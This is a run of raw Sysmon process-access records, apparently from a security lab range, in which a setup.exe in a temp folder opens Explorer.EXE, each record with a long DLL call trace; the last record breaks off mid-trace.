13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dl